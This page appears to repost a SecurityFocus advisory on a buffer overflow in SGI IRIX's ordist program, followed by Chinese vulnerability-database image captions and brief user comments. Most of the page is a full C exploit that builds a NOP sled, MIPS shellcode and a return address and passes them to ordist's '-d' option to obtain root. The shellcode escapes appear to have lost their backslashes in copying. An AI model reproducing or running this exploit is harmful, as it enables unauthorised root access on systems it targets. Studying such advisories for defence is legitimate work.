source: http://www.securityfocus.com/bid/415/info
A buffer overflow exists in the ordist program, as shipped with Irix 6.x and 5.x from Silicon Graphics. By supplying long arguments to the '-d' option, containing a properly crafted buffer of machine exectuable code, root privilege can be obtained.
#include <stdlib.h>
#include <fcntl.h>
#define BUFSIZE 306
#define OFFS 800
#define ADDRS 2
#define ALIGN 2
void run(unsigned char *buf) {
execl("/usr/bsd/ordist", "ordist", "-d", buf, "-d", buf, NULL);
printf("execl failedn");
}
char asmcode[]="x3cx18x2fx62x37x18x69x6ex3cx19x2fx73x37x39x68x2exafxb8xffxf8xafxb9xffxfcxa3xa0xffxffx27xa4xffxf8x27xa5xffxf0x01x60x30x24xafxa4xffxf0xafxa0xffxf4x24x02x04x23x02x04x8dx0c";
char nop[]="x24x0fx12x34";
unsigned long get_sp(void) {
__asm__("or $2,$sp,$0");
}
/* this align stuff sux - i do know. */
main(int argc, char *argv[]) {
char *buf, *ptr, addr[8];
int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS, align=ALIGN;
int i, noplen=strlen(nop);
if (argc >1) bufsize=atoi(argv[1]);
if (argc >2) offs=atoi(argv[2]);
if (argc >3) addrs=atoi(argv[3]);
if (argc >4) align=atoi(argv[4]);
if (bufsize<strlen(asmcode)) {
printf("bufsize too small, code is %d bytes longn", strlen(asmcode));
exit(1);
}
if ((buf=malloc(bufsize+ADDRS<<2+noplen+1))==NULL) {
printf("Can't mallocn");
exit(1);
}
*(int *)addr=get_sp()+offs;
printf("address - %pn", *(int *)addr);
strcpy(buf, nop);
ptr=buf+noplen;
buf+=noplen-bufsize % noplen;
bufsize-=bufsize % noplen;
for (i=0; i<bufsize; i++)
*ptr++=nop[i % noplen];
memcpy(ptr-strlen(asmcode), asmcode, strlen(asmcode));
memcpy(ptr, nop, strlen(nop));
ptr+=align;
for (i=0; i<addrs<<2; i++)
*ptr++=addr[i % sizeof(int)];
*ptr=0;
printf("total buf len - %dn", strlen(buf));
run(buf);
}
![图片[1]-SGI IRIX ordist缓冲区溢出漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png)
CVE编号
![图片[2]-SGI IRIX ordist缓冲区溢出漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png)
CNNVD-ID
恐龙抗狼扛9月前0
kankan啊啊啊啊3年前0
66666666666666